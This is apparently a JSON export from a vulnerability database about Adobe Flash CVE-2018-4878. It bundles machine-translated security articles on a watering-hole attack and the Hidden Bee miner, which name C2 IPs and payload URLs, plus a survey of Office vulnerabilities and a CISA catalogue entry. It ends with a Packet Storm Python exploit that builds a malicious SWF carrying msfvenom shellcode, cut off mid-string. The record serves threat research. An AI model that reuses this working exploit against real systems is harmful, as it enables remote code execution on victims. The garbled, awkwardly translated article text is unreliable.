disk does not leave any persistent or can be traced back traces, also in a non-filtered port using a custom Protocol. Generally speaking, this advanced type of watering hole attack is extremely targeted, and also has a very sophisticated attacker background. \nWhen the CVE-2018-4878 vulnerability code was disclosed after the global range occurs within a multi-national support hacker attacks, malicious software attacks and exploit kits diffusion utilization, the watering hole attack is also regarded as the use of CVE-2018-4878 vulnerability a recent assault case. Currently, the Morphisec analysis report, the Hong Kong Telecommunications Company website, the malicious code has been cleared, site security situation to return to normal. \nAttack analysis \nBe the attackers embed exploits files Flash Virus the home. php main page: \n! [](/Article/UploadPic/2018-4/2018410185228639. jpg? www. myhack58. com) \nThis is an embedded Flash exploit with the previous universal CVE-2018-4878 exploit programs are very similar, but differs in that it is a use-type post-exploitation the program: \n! [](/Article/UploadPic/2018-4/2018410185228777. png? www. myhack58. com) \nIts shellcode will perform Windows System in effective rundll32. exe process, by injecting the process, use it to hide malicious code from running in memory space, and then, the shellcode will download the other follow-up use of code injection to the rundll32 process: \n! [](/Article/UploadPic/2018-4/2018410185229606. png? www. myhack58. com) \n! [](/Article/UploadPic/2018-4/2018410185229608. png? www. myhack58. com) \nThe attacker uses the C2 server is the 106[.] 185.24.241 Japan, it is in the victim host communications, use the 443 port for the custom Protocol, at present, Morphisec being on the Protocol for an in-depth analysis: \n! [](/Article/UploadPic/2018-4/2018410185229504. png? www. myhack58. com) \nAttacks using the Metasploit module \nshellcode download injected into the rundll32 process space of the subsequent use of the code including the Metasploit Meterpreter and Mimikatz module, from the time point of view, these modules are in the attack the previous week, which is 2 on 15 May to be compiled: \n! [](/Article/UploadPic/2018-4/2018410185229378. png? www. myhack58. com) \nFollowing the yellow module is the original Metasploit exploit module: \n! [](/Article/UploadPic/2018-4/2018410185229133. png? www. myhack58. com) \nSummary \nThrough the investigation, Morphisec found that the complexity of the watering hole attack is that the attacker plans to conduct in-depth attack of the prelude, may have very high complexity of the attacker's background. Morphisec claimed that, since the attack uses the CVE-2018-4878 the use of the program, and prior to be found for countries hacking related attacks were highly similar, where there may be some Association. Currently, Morphisec also unlocated traced back to a specific attacker, they will continue to follow up investigation. \nAttack feature \nFlash \u2013 58D15B7A49193022D8FB9712FAC1A9E2 \nC2 - 106[.] 185.24.241 (li715-241. members. linode[.] com:https) \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-10T00:00:00", "type": "myhack58", "title": "CVE-2018-4878 case: for a Hong Kong Telecommunications Company website is intrusion investigations-vulnerability and early warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-04-10T00:00:00", "id": "MYHACK58:62201889929", "href": "http://www.myhack58.com/Article/html/3/62/2018/89929.htm", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-07T13:58:25", "description": "! [](/Article/UploadPic/2018-8/2018871743799. jpg? www. myhack58. com) \nWrite in front of words \nRecently we found a to attempt to exploit CVE-2018-4878 Flash Player vulnerability, vulnerability to attack, its sequence and we currently find any loopholes to use the tool are not the same. After investigation, we found that this is a Chinese security company qihoo 360 in by the end of 2017 the reference to the existing developed part of the framework. But at the time the payload seems to be a promotion of the adware Trojan. And this time, use of the payload it is not a standard PE file. On the contrary, it is more like a multi-stage executable format, and it also acts as a download loader, is used to retrieve hidden Bee miner botnet using the LUA script. This may be the first used mining Crypto-currencies of the bootkit case. \nAdvertising overview \nThe attacker is using the adult site of the temptation of advertising will be the victim attracted to the phishing page. We believe that this series of ads is mainly for Asian countries, the region of the user, according to the ads and our known data. This claim is can be online Dating services of the server that contains a malicious iframe, which is mainly responsible for the development and infected users. \n! [](/Article/UploadPic/2018-8/2018871743829. png? www. myhack58. com) \n! [](/Article/UploadPic/2018-8/2018871743182. png? www. myhack58. com) \nIE exploit \nHere, the malicious code from having embedded encryption block of the web page begins execution. And the use of Base64 encoding and then RC4 or Rabbit two algorithms, one for encryption: \n! [](/Article/UploadPic/2018-8/2018871743257. png? www. myhack58. com) \nAfter decryption, the block will be executed. Here you can find a running Java Script the decoded version. We may be in the script to see, it will generate a random session key, then use the attacker's public RSA key to encrypt to: \n! [](/Article/UploadPic/2018-8/2018871743598. png? www. myhack58. com) \nThe encrypted key will be passed to the next function and converted to JSON format, to a hard-coded URL to perform the POST request: \n! [](/Article/UploadPic/2018-8/2018871743101. png? www. myhack58. com) \nIf we view the client and the server traffic between the client sends the encrypted\u201ckey\u201d, the server response\u201cvalue\u201d, we more clearly find this: \n! [](/Article/UploadPic/2018-8/2018871743454. png? www. myhack58. com) \nServer-side \n1. The attacker of using a private RSA key encryption, the server passes the decryption of the session key. \n2. Select a symmetric algorithm(Rabbit or RC4)encryption vulnerability payload in. \n3. The encrypted content is returned to the client. Since the client in memory still has the key to the unencrypted version, so it can decrypt and execute the vulnerability. However, only from the communication flow can not retrieve the original session key, it is impossible to reproduce the vulnerability. But fortunately, we in the dynamic analysis in the successful capture of a vulnerability. And we found the attacker exploited a vulnerability is CVE-2018-8174 to. \nFlash exploit \nThis is a relatively new Flash Vulnerability, CVE-2018-4878 use the program,in the odd Tiger 360 released document when it is not their exploit kits are part of, may be in order to enhance its performance later add. The vulnerability is in the embedded shell code is just the next stage of the download procedure. Successfully exploited, it will be in the following URL to retrieve the payload: \n! [](/Article/UploadPic/2018-8/2018871744139. png? www. myhack58. com) \nThis extension. wasm file forged into a Web Assembler module. But in fact, it is something completely different. \nAs you can see, it loads for decompressing cabinet file Cabinet. dll module. In a later section, we saw used by the HTTP Protocol to communicate with API and string. We also found that the\u201cdllhost.exe\u201dand\u201cbin/i386/core. sdb\u201dreferences. \n! [](/Article/UploadPic/2018-8/2018871744180. png? www. myhack58. com) \nWe are very easy to guess this module will download and use the dllhost. exe to run. And another string the Base64-encoded content: \n! [](/Article/UploadPic/2018-8/2018871744342. png? www. myhack58. com) \nWhich after decoding of the content to show more of the URL: \nhttp://103.35.72.223/git/wiki.asp?id=530475f52527a9ae1813d529653e9501 \nhttp://103.35.72.223/git/glfw.wasm \nhttp://103.35.72.223/rt/lsv3i06rrmcu491c3tv82uf228.wasm \nLook at the Fiddler capture of the traffic, we found that the module is indeed in the query these URL: \n! [](/Article/UploadPic/2018-8/2018871744460. png? www. myhack58. com) \n\u8bf7\u6c42\u6765\u81eadllhost.exe this may mean that the above executable files have been injected malicious code. File glfw. wasm with the Web Assembly between The have nothing in common. In fact, it is a Cabinet file that contains the internal path of the package content: bin/i386/core. sdb. Seen from inside, we find the same custom executable format, such as DLL names: \n! [](/Article/UploadPic/2018-8/2018871744279. png? www. myhack58. com)\n\n**[1] [[2]](<91130_2.htm>) [next](<91130_2.htm>)**\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-07T00:00:00", "title": "To see the Hidden Bee how to use a new vulnerability propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2018-4878"], "modified": "2018-08-07T00:00:00", "id": "MYHACK58:62201891130", "href": "http://www.myhack58.com/Article/html/3/62/2018/91130.htm", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A use-after-free vulnerability was discovered in Adobe Flash Player before 28.0.0.161. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. A successful attack can lead to arbitrary code execution. This was exploited in the wild in January and February 2018.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Adobe Flash Player Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-4878", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-04-05T01:06:57", "description": "", "cvss3": {}, "published": "2018-04-04T00:00:00", "type": "packetstorm", "title": "Adobe Flash 28.0.0.137 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-4878"], "modified": "2018-04-04T00:00:00", "id": "PACKETSTORM:147041", "href": "https://packetstormsecurity.com/files/147041/Adobe-Flash-28.0.0.137-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n# coding: UTF-8 \nimport BaseHTTPServer \nimport sys \nfrom SimpleHTTPServer import SimpleHTTPRequestHandler \n \nprint \"@Syfi2k\" \nprint \"[+] CVE-2018-4878 poc \" \nprint \"--------------------------------\" \nprint \"Calc.exe Shellcode via Msfvenom\" \nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\" \nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\" \n \n \nbuf = \"\" \nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\" \nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\" \nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\" \nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\" \nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\" \nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\" \nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\" \nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\" \nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\" \nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\" \nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\" \nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\" \nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\" \nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\" \nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\" \n \npayload = buf \ndata = \"\" \nflash_name = \"movie\" \n \n \n \ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\" \n \n \nfiller = 2940 - len(payload) \n \ndata = data + payload + \"\\x90\" * filler \n \n \ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A